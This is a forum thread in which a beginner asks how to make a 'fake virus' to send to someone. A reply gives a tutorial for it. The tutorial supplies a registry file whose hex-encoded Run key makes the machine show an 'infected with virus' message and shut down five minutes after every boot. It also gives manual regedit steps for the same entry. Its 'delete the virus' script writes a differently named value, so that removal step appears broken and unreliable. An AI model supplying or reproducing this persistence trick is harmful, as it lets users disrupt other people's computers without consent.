Results 1 to 4 of 4

Thread: Creating a false virus

  1. #1
    Join Date
    Apr 2008
    Posts
    49

    Creating a false virus

    Hi all,
    I would like to know how to set up a fake virus and can be sent to someone ...
    FALSE This virus will be, I think not very developed but just to display a message on the screen of the person.

    PS: I just learned C (M @ to Chapter 2)

    Thank you all

  2. #2
    Join Date
    Apr 2008
    Posts
    49

    Re: Creating a false virus

    Well, I'll be more specific I'd like to send this "fake virus" to someone and I would like to include some little thing like being on display window (type error message) and if it can not can close it too easily (as if he could only click "OK" for example ) And also when appuit this button and another message appears .

  3. #3
    Join Date
    Dec 2007
    Posts
    1,727

    Re: Creating a false virus

    Well, I know this is not exactly what you want but it just always help : http://www.metacafe.com/watch/673387/make_a_fake_virus/
    http://www.youtube.com/watch?v=lpyMWmkFIbg

  4. #4
    Join Date
    May 2008
    Posts
    2,134

    Re: Creating a false virus

    This tutorial will help a user to create a fake virus………which will force the system to restart or shutdown after a specific period of time……

    Warning: Use it at your own risk. I'll not be responsible for any kind of damage/problem in your system.

    Well….. We all are aware of this program called SHUTDOWN.EXE which allows us to easily create icons to shutdown or restart our computer.

    Quote:
    Shutdown [{-l|-s|-r|-a}] [-f] [-m [\\ComputerName]] [-t xx] [-c "message"] [-d[u][p]xx:yy]


    Parameters
    -l - Logs off the current user, this is also the defualt. -m ComputerName takes
    precedence.
    -s - Shuts down the local computer.
    -r - Reboots after shutdown.
    -a - Aborts shutdown. Ignores other parameters, except -l and ComputerName.
    You can only use -a during the time-out period.
    -f - Forces running applications to close.
    -m [\\ComputerName] - Specifies the computer that you want to shut down.
    -t xx - Sets the timer for system shutdown in xx seconds. The default is 20
    seconds.
    -c "message" - Specifies a message to be displayed in the Message area of the
    System Shutdown window. You can use a maximum of 127 characters. You must enclose the message in quotation marks.

    We use this handy shortcut in Creating a Shutdown/Reboot Icon.
    But this time It will be used for creating a virus……….
    ====

    HOW TO CREATE A VIRUS?

    Method One
    Just open Notepad and paste the given code and then save the file with the name "Ronak Agrawal .reg" and then run the file. It'll ask for confirmation, simply click on YES and then OK.
    Code:
    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Mi crosoft\Windows\CurrentVersion \Run]

    "Shell32"=hex(2):25,00,77,00,6 9,00,6e,00,64,00,69,00,72,00,2 5,00,5c,00,73,00,\
    79,00,73,00,74,00,65,00,6d,00, 33,00,32,00,5c,00,73,00,68,00, 75,00,74,00,64,\
    00,6f,00,77,00,6e,00,2e,00,65, 00,78,00,65,00,20,00,2d,00,73, 00,20,00,2d,00,\
    74,00,20,00,33,00,30,00,30,00, 20,00,2d,00,63,00,20,00,22,00, 59,00,6f,00,75,\
    00,72,00,20,00,43,00,6f,00,6d, 00,70,00,75,00,74,00,65,00,72, 00,20,00,69,00,\
    73,00,20,00,69,00,6e,00,66,00, 65,00,63,00,74,00,65,00,64,00, 20,00,77,00,69,\
    00,74,00,68,00,20,00,76,00,69, 00,72,00,75,00,73,00,20,00,40, 00,52,00,6f,00,\
    6e,00,61,00,6b,00,20,00,41,00, 67,00,72,00,61,00,77,00,61,00, 6c,00,22,00,00,\
    00
    Restart Your PC to see the Effects.
    Method Two

    Click Start > Run.
    Type regedit and press Enter after Run Window emerges.
    Go To
    HKEY_LOCAL_MACHINE\SOFTWARE\Mi crosoft\Windows\Curr entVersion\Run

    Note
    HKEY_LOCAL_MACHINE
    This hive contains information about the computer itself, as well as about the operating system. It includes specific details about all hardware, including keyboard, printer ports, storage—the entire hardware setup. In addition, it has information about security, installed software, system startup, drivers, services, and the machine's specific XP configuration.
    Click on Edit Menu > New > Expanded string value
    Note
    Expanded string value data type contains variables that Windows uses to point to the location of files. For example, to point to the location of the Luna theme file, the expanded string value in the Registry is %SystemRoot%\resources\Themes\ Luna.theme.
    Name the String value as “Shell32”.
    Now, Double click on it to and Set its value as
    %windir%\system32\shutdown.exe -s -t 300 -c "Your Computer is infected with virus @Ronak Agrawal"

    Restart your PC to see the effects……….
    ====

    HOW TO DELETE THE VIRUS?

    Just open Notepad and paste the appropriate code and then save the file with the name "Ronak Agrawal .reg" and then run the file. It'll ask for confirmation, simply click on YES and then OK.
    Code:
    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Mi crosoft\Windows\CurrentVersion \Run]

    "shell"=hex(2):00,00
    Restart Your PC to see the Effects.

Similar Threads

  1. false sense of security & free virus scanners
    By sObama in forum Networking & Security
    Replies: 4
    Last Post: 11-05-2011, 10:04 PM
  2. False positive virus alert on microsoft security essentials
    By Tamali in forum Networking & Security
    Replies: 5
    Last Post: 31-10-2010, 12:01 AM
  3. TR/ATRAPS.Gen virus or false warning
    By Kishan in forum Networking & Security
    Replies: 3
    Last Post: 10-03-2009, 07:34 PM
  4. False Colour
    By Nazz08 in forum Hardware Peripherals
    Replies: 7
    Last Post: 12-11-2008, 03:24 PM

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
Page generated in 1,714,309,978.54670 seconds with 17 queries